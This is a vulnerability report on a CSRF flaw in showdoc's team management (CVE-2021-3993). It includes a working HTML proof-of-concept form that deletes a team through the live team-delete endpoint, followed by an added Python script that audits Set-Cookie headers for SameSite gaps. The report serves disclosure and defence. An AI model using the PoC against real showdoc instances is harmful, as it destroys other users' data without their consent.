CVE-2021-3993: Cross-Site Request Forgery (CSRF) in showdoc

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

Description

You set the strict flag only for one of your cookies, named cookie_token, but in Team management an attacker can still delete or add teams through the CSRF vulnerability, as the cookie named PHPSESSID doesn't have the strict flag.

Proof of Concept

1. Replace 38046 with the team id.

2. Open poc.html and click on the submit button.

3. After that, the team with id 38046 (or your replaced team id) will be deleted.

//poc.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
      <input type="hidden" name="id" value="38046" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
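
The cookie gap in the Description (cookie_token marked Strict, PHPSESSID not) can be checked from a response's Set-Cookie headers. The following is an added example, not part of the original report or of showdoc's code; the header values and function names are constructed for illustration.

```python
# Added example: audit Set-Cookie headers for the SameSite gap described above.
# SAMPLE_HEADERS are constructed values, not captured from showdoc.
SAMPLE_HEADERS = [
    "cookie_token=abc123; path=/; HttpOnly; SameSite=Strict",
    "PHPSESSID=deadbeef; path=/",
    "prefs=dark; Path=/; samesite=none",
]


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, attrs); attribute keys are lower-cased."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    return name, attrs


def samesite_finding(attrs):
    """Return None if the cookie is withheld from cross-site POSTs, else a reason."""
    policy = attrs.get("samesite", "").lower()
    if policy in ("strict", "lax"):
        return None  # neither value is attached to a cross-site form POST
    if policy == "none":
        if "secure" not in attrs:
            return "SameSite=None without Secure: invalid combination"
        return "SameSite=None: sent on cross-site requests"
    if policy == "":
        return "no SameSite attribute: behaviour depends on the browser default"
    return "unrecognised SameSite value %r" % policy


def audit(headers):
    """Map cookie name -> finding for every cookie that fails the check."""
    findings = {}
    for header in headers:
        name, attrs = parse_set_cookie(header)
        reason = samesite_finding(attrs)
        if reason:
            findings[name] = reason
    return findings


if __name__ == "__main__":
    for cookie, reason in audit(SAMPLE_HEADERS).items():
        print(f"{cookie}: {reason}")
```

For PHP's own session cookie, the attribute is controlled by the session.cookie_samesite setting (PHP 7.3 and later).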
